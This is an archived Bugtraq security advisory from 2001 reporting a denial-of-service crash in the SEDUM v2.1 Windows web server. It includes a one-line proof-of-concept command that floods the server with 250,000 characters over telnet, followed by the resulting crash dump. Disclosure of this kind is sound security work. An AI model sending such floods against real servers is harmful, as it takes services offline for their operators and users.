[19354] in bugtraq
SEDUM v2.1 HTTPd - Denial of Service
daemon@ATHENA.MIT.EDU (slipy@B10Z.NET)
Fri Feb 23 16:20:11 2001
Message-ID: <20010223192818.2864.qmail@securityfocus.com>
Date: Fri, 23 Feb 2001 19:28:18 -0000
Reply-To: slipy@B10Z.NET
From: slipy@B10Z.NET
To: BUGTRAQ@SECURITYFOCUS.COM
Introduction:
SEDUM is a standard HTTP server designed for
Internet/Intranet purposes. SEDUM support
parametric html files and direct access to databases
for a simple and powerful network data management.
This software is for the MS operating system.
The Vendors website is:
http://www.frassetto.it/sdm/e_index.htm
Problem: Denial of Service Attack
SEDUM v2.1 is vulnerable to a nasty Denial of
Service attack where it can be flooded with useless
junk until the server crashes promptly. Once it has
been crashed it needs to be restarted again for it to
work properly. All windows versions apear to be
affected.
Examples:
echo `perl -e 'print "A" x 250000'` | telnet .com 80
^^ = Will cause the program to quit within seconds
and display:
EDUM caused an invalid page fault in
module <unknown> at 0000:0111001e.
Registers:
EAX=0122968c CS=016f EIP=0111001e
EFLGS=00010206 EBX=00000000 SS=0177
ESP=006dfab0 EBP=006dfadc ECX=0111027c
DS=0177 ESI=0048258c FS=7677 EDX=0111000c
ES=0177 EDI=00000000 GS=0000 Bytes at CS:EIP:
00 a0 2c 00 11 01 0c 00 11 01 00 02 00 00 01 00
Stack dump:
0042bbed 00000001 0048258c 0042ba02 00000000
0048258c 004575fd 00000000 005b037c 012291d0
005b03e4 00000001 004576cc 0000008c 000005b4
00457751
Solution:
Vendor has been notified, and waiting for reply.
Judging from the posts about the directory traversals
with SEDUM and the authors response, don't expect
a fix anytime soon.
--------------------
b10z HTTPd Advisory
slipy@b10z.net
Found: February 23rd, 2001.
(PS: sorry if this message looks weird, bugtraq
seems to always format my messages all screwy)
